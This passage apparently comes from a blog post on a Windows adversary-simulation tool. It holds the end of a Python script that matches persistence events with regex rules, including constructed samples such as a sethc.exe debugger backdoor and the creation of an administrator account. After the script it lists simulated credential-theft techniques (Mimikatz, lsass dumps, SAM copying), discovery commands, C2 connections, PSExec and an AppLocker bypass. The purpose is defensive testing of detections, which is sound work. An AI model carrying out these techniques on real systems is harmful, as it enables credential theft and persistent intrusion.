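    ("Create local user", r"^UserCreated "),
    ("Create local Administrator", r"^GroupMemberAdded Administrators "),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in PERSISTENCE_RULES]

# Constructed event records, not real telemetry.  Registry paths and names
# match the test cases in the list above; the last record is benign.
SAMPLE_EVENTS = [
    r"RegistryValueSet HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = cmd.exe",
    r"RegistryValueSet HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = pserver32.dll",
    r"RegistryValueSet HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{842562ef-8d28-411d-a67d-ab75ef611fe8}.sdb\DisplayName = x",
    r"RegistryValueSet HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updater = C:\tmp\a.exe",
    r"RegistryValueSet HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = C:\tmp\a.exe",
    r'ServiceInstalled WindowsHealth path="C:\Program Files\Health\svc.exe"',
    r"ServiceInstalled WindowsHealth path=C:\Program Files\Health\svc.exe",
    r"ScheduledTaskCreated OfficeUpdaterA",
    r"UserCreated support_388945a0",
    r"GroupMemberAdded Administrators Lost_337fde69_81a9",
    r"RegistryValueSet HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop = C:\Users\x\Desktop",
]


def match_persistence_events(events):
    """Return [(rule_name, event)] for every rule each event triggers."""
    hits = []
    for event in events:
        for name, pattern in COMPILED:
            if pattern.search(event):
                hits.append((name, event))
    return hits


def summarize(events):
    """Count hits per rule, so a blue team can see which test cases its telemetry surfaces."""
    return Counter(name for name, _ in match_persistence_events(events))


if __name__ == "__main__":
    for name, count in sorted(summarize(SAMPLE_EVENTS).items()):
        print(f"{count}  {name}")
```

A test case that produces no hit here (or in the real SIEM) is the useful result: it means either the telemetry source for that artifact is not being collected, or the rule does not cover the path the test actually writes, and both are fixable before a real adversary relies on the same technique.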

Credential Access

  1. Mimikatz – Logonpasswords – Download mimikatz to a random file name and execute it with the following arguments “privilege::debug” “sekurlsa::logonpasswords” “exit” (credit:
  2. PowerShell Mimikatz – Run Invoke-Mimikatz.ps1  (credit:
  3. PowerShell Encoded Mimikatz – Run Invoke-Mimikatz.ps1 with encoded PowerShell command line
  4. Capture Lsass Memory Dump – Using Windows Error Reporting to capture lsass memory (credit:
  5. Capture Lsass Memory Dump (Prodump) – Download Prodump to a random file and capture lsass memory
  6. Copy Local SAM File (via Invoke-NinjaCopy) – Run Invoke-NinjaCopy to copy C:\Windows\System32\config\sam file (credit:

Discovery Tactics

  1. Account Discovery – running net commands to discover local and domain users and groups
  2. Network Service Scanning – ports scan (1-1024) on user selected host
  3. System Owner Discovery – whoami command
  4. System Time Discovery – Running “net time” and “w32tm.exe /tz” commands
  5. Service Discovery – List of all services
  6. Network Connections Discovery – netstat

Command and Control

  1. Commonly used Ports – Trying to connect to user selected host
  2. Uncommonly used Ports – Trying to connect to user selected host using uncommon ports  (credit: Florian Roth)
  3. Web Service – Create a new post at pastebin and upload BITS service information
  4. DNS – Well-Known Blacklisted IP Address – Resolving top 10 malicious IP addresses (credit: Florian Roth)
  5. Connect – Well-Known Blacklisted IP Address – Connecting to top 10 malicious IP addresses (credit: Florian Roth)


  1. PSExec (random file name) – Rename PSExec to a random file name and execute it (credit:
  2. PSExec (Remote) – Running psexec on user selected host
  3. PowerShell API call – Native API call from PowerShell
  4. Self Delete (batch file) – self deleting batch file
  5. WMI Process Execution – use the WMI command-line (WMIC) utility


  1. Screen Capture – screen capture (credit:

AppLocker Bypasses

  1. Regsvr32 – Regsvr32 technique (credit:

Original Post:
